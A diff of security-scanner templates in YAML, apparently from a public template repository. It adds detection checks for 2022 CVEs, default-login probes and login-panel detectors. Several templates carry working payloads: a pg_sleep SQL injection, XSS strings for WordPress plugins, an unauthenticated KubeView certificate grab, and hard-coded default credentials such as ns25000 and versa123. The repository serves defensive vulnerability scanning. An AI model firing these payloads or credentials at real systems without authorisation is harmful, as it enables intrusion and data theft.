cwe-id: CWE-89
|
||||
tags: cve,cve2022,terraboard,sqli,huntr
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 10s
|
||||
GET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(10))+ISNULL-- HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=5'
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"page":'
|
||||
- '"results":'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,46 @@
|
|||
id: CVE-2022-1916
|
||||
|
||||
info:
|
||||
name: Active Products Tables for WooCommerce < 1.0.5 - Cross Site Scripting
|
||||
author: Akincibor
|
||||
severity: medium
|
||||
description: |
|
||||
The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected cross-Site Scripting.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/d16a0c3d-4318-4ecd-9e65-fc4165af8808
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1916
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2022-1916
|
||||
cwe-id: CWE-79
|
||||
tags: wordpress,wp-plugin,xss,wpscan,cve,cve2022,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\u003cscript%3Ealert(document.domain)\u003c/script%3E%22}'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<script>alert(document.domain)</script>'
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'woot-content-in-popup'
|
||||
- 'woot-system'
|
||||
- 'woot-table'
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,43 @@
|
|||
id: CVE-2022-1933
|
||||
|
||||
info:
|
||||
name: CDI < 5.1.9 - Cross Site Scripting
|
||||
author: Akincibor
|
||||
severity: medium
|
||||
description: |
|
||||
The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/6cedb27f-6140-4cba-836f-63de98e521bf
|
||||
- https://wordpress.org/plugins/collect-and-deliver-interface-for-woocommerce/advanced/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-1933
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2022-1933
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cdi,wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<script>alert(document.domain)</script>'
|
||||
- 'Tracking code not correct'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2022-2034
|
||||
|
||||
info:
|
||||
name: Sensei LMS < 4.5.0 - Unauthenticated Private Messages Disclosure
|
||||
author: imhunterand
|
||||
severity: medium
|
||||
description: |
|
||||
The Sensei LMS WordPress plugin before 4.5.0 does not have proper permissions set in one of its REST endpoint, allowing unauthenticated users to access private messages sent to teachers
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/aba3dd58-7a8e-4129-add5-4dd5972c0426
|
||||
- https://hackerone.com/reports/1590237
|
||||
- https://wordpress.org/plugins/sensei-lms/advanced/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-2034
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2022-2034
|
||||
cwe-id: CWE-862
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: wp,disclosure,wpscan,cve,cve2022,sensei-lms,fuzz,hackerone,wordpress,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"
|
||||
|
||||
payloads:
|
||||
num: helpers/wordlists/numbers.txt
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'sensei_message'
|
||||
- 'guid":{"rendered":'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- application/json
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -2,7 +2,7 @@ id: CVE-2022-23131
|
|||
|
||||
info:
|
||||
name: Zabbix - SAML SSO Authentication Bypass
|
||||
author: For3stCo1d
|
||||
author: For3stCo1d,spac3wh1te
|
||||
severity: critical
|
||||
description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.
|
||||
reference:
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2022-25323
|
||||
|
||||
info:
|
||||
name: ZEROF Web Server 2.0 Cross-Site Scripting
|
||||
name: ZEROF Web Server 2.0 - Cross-Site Scripting
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.
|
||||
|
|
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2022-25481
|
||||
|
||||
info:
|
||||
name: ThinkPHP 5.0.24 - Information Disclosure
|
||||
author: caon
|
||||
severity: high
|
||||
description: |
|
||||
ThinkPHP Framework v5.0.24 was discovered to be configured without the PATHINFO parameter. This allows attackers to access all system environment parameters from index.php.
|
||||
reference:
|
||||
- https://github.com/Lyther/VulnDiscover/blob/master/Web/ThinkPHP_InfoLeak.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-25481
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2022-25481
|
||||
cwe-id: CWE-668
|
||||
metadata:
|
||||
shodan-query: title:"ThinkPHP"
|
||||
verified: "true"
|
||||
tags: cve,cve2022,thinkphp,exposure,oss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/index.php?s=example'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "ThinkPHP"
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "HttpException"
|
||||
- "TRACE"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 404
|
|
@ -15,9 +15,9 @@ info:
|
|||
cve-id: CVE-2022-3484
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: true
|
||||
google-dork: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php
|
||||
verified: "true"
|
||||
tags: wp-plugin,xss,wpb-show-core,wpscan,cve,cve2022,wp,wordpress
|
||||
tags: wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss,wpb-show-core
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -0,0 +1,64 @@
|
|||
id: CVE-2022-3506
|
||||
|
||||
info:
|
||||
name: WordPress Related Posts <= 2.1.2 - Cross-Site Scripting
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
The Related Posts for WordPress plugin is vulnerable to stored XSS, specifically in the rp4wp[heading_text] parameter because the user input is not properly sanitized, allowing the insertion of JavaScript code that can exploit the vulnerability.
|
||||
reference:
|
||||
- https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828/
|
||||
- https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828
|
||||
- https://github.com/barrykooij/related-posts-for-wp/commit/37733398dd88863fc0bdb3d6d378598429fd0b81
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2022-3506
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: wordpress,wp,wp-plugin,relatedposts,cve,cve2022,xss,authenticated,huntr
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||
|
||||
- |
|
||||
GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /wp-admin/options.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
option_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D
|
||||
|
||||
- |
|
||||
GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "contains(all_headers_4, 'text/html')"
|
||||
- "status_code_4 == 200"
|
||||
- 'contains(body_4, "value=\"\" autofocus onfocus=alert(document.domain)>")'
|
||||
- "contains(body_4, 'The amount of automatically')"
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: nonce
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- 'name="_wpnonce" value="([0-9a-z]+)" />'
|
||||
internal: true
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2022-45933
|
||||
|
||||
info:
|
||||
name: KubeView - Information disclosure
|
||||
author: For3stCo1d
|
||||
severity: critical
|
||||
description: |
|
||||
KubeView through 0.1.31 allows attackers to obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication, and retrieves certificate files that can be used for authentication as kube-admin. NOTE: the vendor's position is that KubeView was a "fun side project and a learning exercise," and not "very secure."
|
||||
reference:
|
||||
- https://github.com/benc-uk/kubeview/issues/95
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-45933
|
||||
cwe-id: CWE-287
|
||||
metadata:
|
||||
shodan-query: http.title:"KubeView"
|
||||
verified: "true"
|
||||
tags: cve,cve2022,kubeview,kubernetes,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/scrape/kube-system"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'BEGIN CERTIFICATE'
|
||||
- 'END CERTIFICATE'
|
||||
- 'kubernetes.io'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,48 @@
|
|||
id: nsicg-default-login
|
||||
|
||||
info:
|
||||
name: Ns-icg Default Login
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: |
|
||||
There is a weak password vulnerability in NetentSec Internet Control Gateway ns-icg of Beijing NetentScience and Technology Co., Ltd., which allows attackers to successfully log in to the system and obtain sensitive information by exploiting this loophole.
|
||||
reference: |
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603
|
||||
metadata:
|
||||
verified: true
|
||||
fofa-query: "NS-ICG"
|
||||
tags: nsicg,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 25s
|
||||
POST /user/login/login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
usrname={{username}}&pass={{password}}&signinfo=&ukey_user_flag=0&SlotSerialNumber=&agree=
|
||||
|
||||
- |
|
||||
@timeout: 25s
|
||||
GET /user/main HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: {{BaseURL}}/user/login/
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
- ns25000
|
||||
password:
|
||||
- ns25000
|
||||
|
||||
cookie-reuse: true
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(all_headers_1, "/user/main/")'
|
||||
- 'status_code_1 == 302'
|
||||
- 'status_code_2 == 200'
|
||||
- contains(body_2, "var loguser = \'ns25000")
|
||||
condition: and
|
|
@ -3,7 +3,7 @@ id: kingsoft-v8-default-login
|
|||
info:
|
||||
name: Kingsoft V8 Default Login
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
severity: high
|
||||
reference:
|
||||
- https://idc.wanyunshuju.com/aqld/2123.html
|
||||
tags: kingsoft,default-login
|
||||
|
@ -14,7 +14,7 @@ requests:
|
|||
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
{"get_user_login_cmd":{"name":"{{username}}","password":"{{md5("{{password}}")}}"}}
|
||||
{"get_user_login_cmd":{"name":"{{username}}","password":"{{md5(password)}}"}}
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
|
@ -22,6 +22,7 @@ requests:
|
|||
- admin
|
||||
password:
|
||||
- admin
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
|
|
|
@ -0,0 +1,57 @@
|
|||
id: versa-flexvnf-default-login
|
||||
|
||||
info:
|
||||
name: Versa FlexVNF Web-UI - Default Login
|
||||
author: c-sh0
|
||||
severity: high
|
||||
reference:
|
||||
- https://versa-networks.com/products/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Flex VNF Web-UI"
|
||||
tags: default-login,versa,flexvnf
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /authenticate HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /authenticate HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json;charset=UTF-8
|
||||
CSRF-Token: {{xsrf_token}}
|
||||
|
||||
{"username":"{{username}}","password":"{{password}}"}
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
- versa
|
||||
- admin
|
||||
password:
|
||||
- versa123
|
||||
- versa123
|
||||
|
||||
cookie-reuse: true
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "{\"username\":\"{{username}}\",\"error\":false}"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: xsrf_token
|
||||
group: 1
|
||||
internal: true
|
||||
part: header
|
||||
regex:
|
||||
- '(?i)Set-Cookie: XSRF-TOKEN=([A-Za-z0-9_.-]+)'
|
|
@ -1,9 +1,14 @@
|
|||
id: apache-jmeter-dashboard
|
||||
|
||||
info:
|
||||
name: Apache JMeter Dashboard
|
||||
name: Apache JMeter Dashboard Login Panel - Detect
|
||||
author: tess
|
||||
severity: low
|
||||
description: Apache JMeter Dashboard login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Apache JMeter Dashboard"
|
||||
|
@ -26,3 +31,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -1,11 +1,13 @@
|
|||
id: public-tomcat-manager
|
||||
|
||||
info:
|
||||
name: Apache Tomcat Manager Disclosure
|
||||
name: Apache Tomcat Manager Login Panel - Detect
|
||||
author: Ahmed Sherif,geeknik,sinKettu
|
||||
severity: info
|
||||
description: An Apache Tomcat Manager panel was discovered.
|
||||
description: Apache Tomcat Manager login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: title:"Apache Tomcat"
|
||||
|
@ -20,6 +22,7 @@ requests:
|
|||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: response
|
||||
words:
|
||||
- "Apache Tomcat"
|
||||
- "Tomcat Manager"
|
||||
|
@ -30,3 +33,5 @@ requests:
|
|||
- 401
|
||||
- 200
|
||||
condition: or
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: asus-router-panel
|
||||
|
||||
info:
|
||||
name: Asus Router Login Panel
|
||||
author: arafatansari
|
||||
severity: info
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: 'Server: httpd/2.0 port:8080'
|
||||
tags: panel,asus,router,iot
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/Main_Login.asp"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>ASUS Login</title>'
|
||||
- 'Sign in with your ASUS router account'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: backpack-admin-panel
|
||||
|
||||
info:
|
||||
name: Backpack Admin Login Panel
|
||||
author: shine
|
||||
severity: info
|
||||
description: |
|
||||
An Backpack Admin dashboard was detected.
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Backpack Admin"
|
||||
tags: panel,backpack,admin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/login"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'Backpack Admin'
|
||||
- 'backpack_alerts'
|
||||
condition: or
|
|
@ -0,0 +1,40 @@
|
|||
id: cisco-webvpn-detect
|
||||
|
||||
info:
|
||||
name: Cisco WebVPN Detect
|
||||
author: ricardomaia
|
||||
severity: info
|
||||
reference:
|
||||
- https://askanydifference.com/difference-between-cisco-clientless-ssl-vpn-and-anyconnect-with-table/
|
||||
metadata:
|
||||
verified: true
|
||||
fofa-query: fid="U1TP/SJklrT9VLIEpZkQNg=="
|
||||
google-query: intitle:"SSLVPN Service"
|
||||
tags: panel,cisco,vpn
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
- "{{BaseURL}}/webvpn.html"
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "CISCO"
|
||||
- "AnyConnect"
|
||||
- "SSLVPN Service"
|
||||
condition: or
|
||||
case-insensitive: true
|
||||
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- "webvpncontext=00@.+"
|
||||
- "webvpn="
|
||||
condition: or
|
|
@ -0,0 +1,27 @@
|
|||
id: cudatel-panel
|
||||
|
||||
info:
|
||||
name: CudaTel Login Panel
|
||||
author: arafatansari
|
||||
severity: info
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"CudaTel"
|
||||
tags: panel,cudatel
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'CudaTel Communications Server'
|
||||
- 'alt="CudaTel'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,9 +1,14 @@
|
|||
id: dplus-dashboard
|
||||
|
||||
info:
|
||||
name: DPLUS Dashboard Exposure
|
||||
name: DPLUS Dashboard Panel - Detect
|
||||
author: tess
|
||||
severity: info
|
||||
description: DPLUS Dashboard panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"DPLUS Dashboard"
|
||||
|
@ -27,3 +32,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -0,0 +1,25 @@
|
|||
id: dqs-superadmin-panel
|
||||
|
||||
info:
|
||||
name: DQS Superadmin Login Panel
|
||||
author: Hardik-Solanki
|
||||
severity: info
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"DQS Superadmin"
|
||||
tags: panel,dqs,superadmin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/#/login'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "DQS | Superadmin"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,28 @@
|
|||
id: dradis-pro-panel
|
||||
|
||||
info:
|
||||
name: Dradis Professional Edition Panel
|
||||
author: righettod
|
||||
severity: info
|
||||
reference:
|
||||
- https://dradisframework.com/ce/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Dradis Professional Edition"
|
||||
tags: panel,dradis
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/pro/login"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Dradis Professional Edition"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,42 @@
|
|||
id: exolis-engage-panel
|
||||
|
||||
info:
|
||||
name: Exolis Engage Panel - Detect
|
||||
author: righettod
|
||||
description: Exolis Engage panel was detected.
|
||||
severity: info
|
||||
reference:
|
||||
- https://www.exolis.fr/en/solution-2/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: html:"engage - Portail soignant"
|
||||
google-dork: intitle:"engage - Portail soignant"
|
||||
tags: panel,exolis,engage
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/app.js"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "engage-specific-config"
|
||||
- "engage-lastAppUserType"
|
||||
- "engage-lastHelperPatientContext"
|
||||
- "engage-preferred-language"
|
||||
- "engageManager.admin"
|
||||
- "engageManager.user"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/29
|
|
@ -1,9 +1,14 @@
|
|||
id: fastpanel-hosting-control-panel
|
||||
|
||||
info:
|
||||
name: Fastpanel Hosting Control Panel
|
||||
name: FASTPANEL Login Panel - Detect
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
description: FASTPANEL login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"FASTPANEL HOSTING CONTROL"
|
||||
|
@ -24,3 +29,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/28
|
||||
|
|
|
@ -0,0 +1,25 @@
|
|||
id: flahscookie-superadmin-panel
|
||||
|
||||
info:
|
||||
name: Flahscookie Superadmin Login
|
||||
author: Hardik-Solanki
|
||||
severity: info
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Flahscookie Superadmin"
|
||||
tags: panel,flahscookie,superadmin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/pages/login'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Flahscookie Superadmin"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,12 +1,16 @@
|
|||
id: ibm-security-access-manager
|
||||
|
||||
info:
|
||||
name: Detects IBM Security Access Manager
|
||||
name: IBM Security Access Manager Login Panel - Detect
|
||||
author: geeknik
|
||||
severity: info
|
||||
description: IBM Security Access Manager is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets.
|
||||
description: IBM Security Access Manager login panel was detected.
|
||||
reference:
|
||||
- https://www.ibm.com/docs/en/sva/9.0.7?topic=overview-introduction-security-access-manager
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
tags: panel,ibm
|
||||
|
||||
requests:
|
||||
|
@ -32,3 +36,5 @@ requests:
|
|||
- "/mga/sps/authsvc/policy/forgot_password"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: ibm-service-assistant
|
||||
|
||||
info:
|
||||
name: IBM Service Assistant
|
||||
name: IBM Service Assistant Login Panel - Detect
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
description: IBM Service Assistant login panel was detected.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
shodan-query: http.title:"Welcome to Service Assistant"
|
||||
tags: panel,ibm,service
|
||||
|
@ -22,3 +27,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,11 +1,16 @@
|
|||
id: ibm-websphere-admin-panel
|
||||
|
||||
info:
|
||||
name: WebSphere Application Server Community Edition Admin Panel
|
||||
name: IBM WebSphere Application Server Community Edition Admin Login Panel - Detect
|
||||
author: ritikchaddha
|
||||
severity: info
|
||||
description: IBM WebSphere Application Server Community Edition admin login panel was detected.
|
||||
reference:
|
||||
- https://www.ibm.com/support/pages/what-default-username-and-password-websphere-application-server-community-edition-and-how-add-users-admin-group
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
|
||||
cvss-score: 0.0
|
||||
cwe-id: CWE-200
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.favicon.hash:1337147129
|
||||
|
@ -30,3 +35,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/11/21
|
||||
|
|
|
@ -1,9 +1,14 @@
|
|||
id: ibm-websphere-panel
|
||||
|
||||
info:
|
||||
name: IBM WebSphere Panel
|
||||
name: IBM WebSphere Portal Login Panel - Detect
|
||||
author: pdteam
|
||||
severity: info
|
||||
description: IBM WebSphere Portal login panel was detected.
|
||||
classification:
|
||||
